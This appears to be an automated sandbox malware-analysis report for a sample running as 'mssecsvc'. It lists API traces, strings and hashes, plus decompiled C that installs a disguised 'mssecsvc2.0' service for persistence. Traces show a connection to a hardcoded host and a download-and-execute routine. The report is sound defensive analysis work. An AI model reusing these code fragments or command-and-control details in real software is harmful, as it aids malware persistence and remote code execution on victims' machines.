                    • Opcode ID: 32195eb0042ebaec25477c261ddf2c99814d954fd4820c083845d242e76727b2
                    • Instruction ID: 31d302d59c0e1f21b6bd0cc83818483a3c78bcaa99e9f7b56f08f1d198bad350
                    • Opcode Fuzzy Hash: 32195eb0042ebaec25477c261ddf2c99814d954fd4820c083845d242e76727b2
                    • Instruction Fuzzy Hash: BF715D31505205FFEB219F20CC49BBE3BBEEF85715F100068EA0A9E491C7B69F459B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA4178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                    • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • wsprintfA.USER32 ref: 7FEA4179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                    • GetTickCount.KERNEL32 ref: 7FEA41F6
                    • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA428B
                    • GetTickCount.KERNEL32 ref: 7FEA4294
                    • closesocket.WS2_32(6F6C6902), ref: 7FEA42B8
                    • SetEvent.KERNEL32(000002A4,?,00000000), ref: 7FEA42D6
                    • Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
                    • ResetEvent.KERNEL32(000002A4,?,00000000), ref: 7FEA430A
                    Strings
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA4178, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT
                    • API String ID: 883794535-3876287451
                    • Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                    • Instruction ID: 62042b7e1d70db51705c832b3ce7fc9885254b828fc8a61664828cce23236026
                    • Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                    • Instruction Fuzzy Hash: AD71EF75508348BAEB229F3488587EEBFAEEF81314F000608E85A9E1D1C7F66F45D761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B04178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B04057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B04066
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                    • connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • wsprintfA.USER32 ref: 00B04179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B041B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B06AA2,00000000,00000000), ref: 00B041BD
                    • GetTickCount.KERNEL32 ref: 00B041F6
                    • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00B06AA2,00000000,00000000), ref: 00B0428B
                    • GetTickCount.KERNEL32 ref: 00B04294
                    • closesocket.WS2_32(6F6C6902), ref: 00B042B8
                    • SetEvent.KERNEL32(000002A4,?,00000000), ref: 00B042D6
                    • Sleep.KERNEL32(00007530,?,00000000), ref: 00B042F7
                    • ResetEvent.KERNEL32(000002A4,?,00000000), ref: 00B0430A
                    Strings
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B04178, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT
                    • API String ID: 883794535-3876287451
                    • Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                    • Instruction ID: 6b5b5d4355f1bb0b1e9713937209442423c70db457b459b14ad4e39ba85b7383
                    • Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                    • Instruction Fuzzy Hash: 0F71ECB1618258BAEB319F24885D7AE7FEDEF41310F040688EA5A9E0C1C7F45F85C765
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B0388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTime.KERNEL32(00B07584), ref: 00B0389F
                    • Sleep.KERNEL32(0000EA60), ref: 00B03911
                    • InternetGetConnectedState.WININET(?,00000000), ref: 00B0392A
                    • gethostbyname.WS2_32(0D278125), ref: 00B0396C
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B03981
                    • ioctlsocket.WS2_32(?,8004667E), ref: 00B0399A
                    • connect.WS2_32(?,?,00000010), ref: 00B039B3
                    • Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 00B039C1
                    • closesocket.WS2_32 ref: 00B03A20
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
                    • String ID: uqghqa.com
                    • API String ID: 159131500-3379764604
                    • Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                    • Instruction ID: 32bbd515bac4fb6fae1c9874063fbf14ff13b6d42bcff959ce71312b81d6961f
                    • Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                    • Instruction Fuzzy Hash: 0D418E31644249BAEB219E248C4EBAD7FDEEF85B10F0440A9F94AEE1C1D7F59F418720
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






                    0x00407c56
                    0x00407c6e
                    0x00407c72
                    0x00407cd3
                    0x00407c74
                    0x00407ca7
                    0x00407cab
                    0x00407cb2
                    0x00407cb9
                    0x00407cb9
                    0x00407cbc
                    0x00407cc9
                    0x00407cc9

                    APIs
                    • sprintf.MSVCRT ref: 00407C56
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                    • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F75FB10,00000000), ref: 00407C9B
                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                    • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                    • API String ID: 3340711343-4063779371
                    • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                    • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}










                    0x0040809f
                    0x004080a5
                    0x004080ab
                    0x004080ae
                    0x004080c9
                    0x004080cb
                    0x004080cd
                    0x004080e8
                    0x004080ea
                    0x004080ec
                    0x004080f1
                    0x004080fa
                    0x004080fa
                    0x004080fd
                    0x00408100
                    0x00408105
                    0x0040810e
                    0x00408116
                    0x0040811e
                    0x00408130
                    0x004080b0
                    0x004080b8
                    0x004080b8

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                    • __p___argc.MSVCRT ref: 004080A5
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                    • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F75FB10,00000000,?,004081B2), ref: 004080DC
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                    • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                    • String ID: mssecsvc2.0
                    • API String ID: 4274534310-3729025388
                    • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                    • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA33E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                    • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                    • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                    • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                    • UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                    • String ID: C:,$\Device\PhysicalMemory
                    • API String ID: 2985292042-1440550476
                    • Opcode ID: 9ac2774a33b6e9a16feb6a2e7a11847f6df0cfcf806cd1476616283f6a82205b
                    • Instruction ID: 89bc292a39abda77eba81180b1336a71123f95df307fbb064623dea506d6362f
                    • Opcode Fuzzy Hash: 9ac2774a33b6e9a16feb6a2e7a11847f6df0cfcf806cd1476616283f6a82205b
                    • Instruction Fuzzy Hash: 5A817671500208FFEB218F14CC89ABA7BADEF44704F504658ED1A9F295D7F2AF458BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B033E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B0344A
                    • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B03469
                    • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B03493
                    • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B034A0
                    • UnmapViewOfFile.KERNEL32(?), ref: 00B034B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                    • String ID: C:,$\Device\PhysicalMemory
                    • API String ID: 2985292042-1440550476
                    • Opcode ID: 9ac2774a33b6e9a16feb6a2e7a11847f6df0cfcf806cd1476616283f6a82205b
                    • Instruction ID: 5d8f26426e67dff5504208db1d46564283051eaf6ef2413262685fae4bd12b30
                    • Opcode Fuzzy Hash: 9ac2774a33b6e9a16feb6a2e7a11847f6df0cfcf806cd1476616283f6a82205b
                    • Instruction Fuzzy Hash: A1817971500208FFEB248F14CC89AAA3BADFF45B14F504658ED199F291D7F4AF458A64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                    • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                    • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                    • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                    • UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                    • String ID: C:,$ysic
                    • API String ID: 2985292042-2852681185
                    • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                    • Instruction ID: 20dbb16ab5d0e33e58175ecc7424444a29ed84bf4ea1b595fcedbc50fe00d084
                    • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                    • Instruction Fuzzy Hash: D5115B74140608BFEB21CF10CC55FAA7A7DEF88704F50451CEA1A9E290EBF56F188A68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B0344A
                    • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B03469
                    • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B03493
                    • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B034A0
                    • UnmapViewOfFile.KERNEL32(?), ref: 00B034B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                    • String ID: C:,$ysic
                    • API String ID: 2985292042-2852681185
                    • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                    • Instruction ID: 559b2d8aa54e4407264a85ef12cda6aceb5e069145916b96a6dc84eacf7b0b12
                    • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                    • Instruction Fuzzy Hash: 8F116074140608BBEB24CF14CC59F9E3ABCEF88B04F50461CEA199B2D0D7F46F188658
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B027A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON
                    Download Yara Rule
                    APIs
                    • GetTempFileNameA.KERNEL32(?,00B027A3,00000000,?), ref: 00B027A8
                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00B027A3,00000000,?), ref: 00B027C3
                    • InternetReadFile.WININET(?,?,00000104), ref: 00B027DD
                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00B027A3,00000000,?), ref: 00B027F3
                    • CloseHandle.KERNEL32(?,00000104,?,00000000,?,00B027A3,00000000,?), ref: 00B027FF
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00B027A3), ref: 00B02823
                    • InternetCloseHandle.WININET(?), ref: 00B02833
                    • InternetCloseHandle.WININET(00000000), ref: 00B0283A
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
                    • String ID:
                    • API String ID: 3452404049-0
                    • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                    • Instruction ID: 3189656eef598a48bbe5ba90781ea45905783295adf0d12584f0d91f1734b68d
                    • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                    • Instruction Fuzzy Hash: 331180B1100606BBFB250F20CC4EFFF7A6DEF84B10F004519FA0699090DBF59E5596A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA4C9E Relevance: 8.4, Strings: 6, Instructions: 887COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$MappingView
                    • String ID: !$&$&$($@$nr
                    • API String ID: 1961427682-1764398444
                    • Opcode ID: eb0b80b5b8c470231b60263bead1ff73dee7615561cc94aa97259510d45e5100
                    • Instruction ID: 315fdaacc53f250e916f795bf55b2d720170911211425d0255cd73c6d26d1a9a
                    • Opcode Fuzzy Hash: eb0b80b5b8c470231b60263bead1ff73dee7615561cc94aa97259510d45e5100
                    • Instruction Fuzzy Hash: 39823232509309EFDB26CF28C4457B97BBAEF41328F105259D81A4F295D3B69F94CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA24AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcpyW.KERNEL32(?,\BaseNamedObjects\itatVt), ref: 7FEA24BA
                    • lstrlenW.KERNEL32(?), ref: 7FEA24C1
                    • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FEA2516
                    Strings
                    • \BaseNamedObjects\itatVt, xrefs: 7FEA24B8
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateSectionlstrcpylstrlen
                    • String ID: \BaseNamedObjects\itatVt
                    • API String ID: 2597515329-326862825
                    • Opcode ID: e0317b2a45198a4f95c789c461bf9cddf4da64e2268a70bd60da681b278261ba
                    • Instruction ID: bc720c525979b78a484a70c7f2d6f0073f93a57bf06c821743778789892915ba
                    • Opcode Fuzzy Hash: e0317b2a45198a4f95c789c461bf9cddf4da64e2268a70bd60da681b278261ba
                    • Instruction Fuzzy Hash: 3D0181B0781344BBF7309B29CC4BF5B7D69DFC1B50F508558F608AE1C4DAB89A0483A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B024AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcpyW.KERNEL32(?,\BaseNamedObjects\itatVt), ref: 00B024BA
                    • lstrlenW.KERNEL32(?), ref: 00B024C1
                    • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 00B02516
                    Strings
                    • \BaseNamedObjects\itatVt, xrefs: 00B024B8
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateSectionlstrcpylstrlen
                    • String ID: \BaseNamedObjects\itatVt
                    • API String ID: 2597515329-326862825
                    • Opcode ID: e0317b2a45198a4f95c789c461bf9cddf4da64e2268a70bd60da681b278261ba
                    • Instruction ID: a6b36c100c6e39be156390fa89fde2023c108204abcbae6d9420e1ba9b665d91
                    • Opcode Fuzzy Hash: e0317b2a45198a4f95c789c461bf9cddf4da64e2268a70bd60da681b278261ba
                    • Instruction Fuzzy Hash: BA0181B0781344BBF7309B29CC4BF5B7D69DF81B50F508558F608AE1C4DAB89A0483A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                    Strings
                    • \BaseNamedObjects\itatVt, xrefs: 7FEA254B
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: OpenSection
                    • String ID: \BaseNamedObjects\itatVt
                    • API String ID: 1950954290-326862825
                    • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                    • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                    • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                    • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA2574 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 7FEA252F: NtOpenSection.NTDLL(?,0000000E), ref: 7FEA255E
                    • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 7FEA25A4
                    • CloseHandle.KERNEL32(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,7FEA0815), ref: 7FEA25AC
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Section$CloseHandleOpenView
                    • String ID:
                    • API String ID: 2731707328-0
                    • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                    • Instruction ID: 3cc34a18b6b0f74ef45f64819b33cb598c6401d77195fbf03454f98489c8026e
                    • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                    • Instruction Fuzzy Hash: 9A21F970301646BBDB18DE65CC55FBA7369FF80648F401118E85ABE1D4DBB2BA24C758
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA1422 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON
                    Download Yara Rule
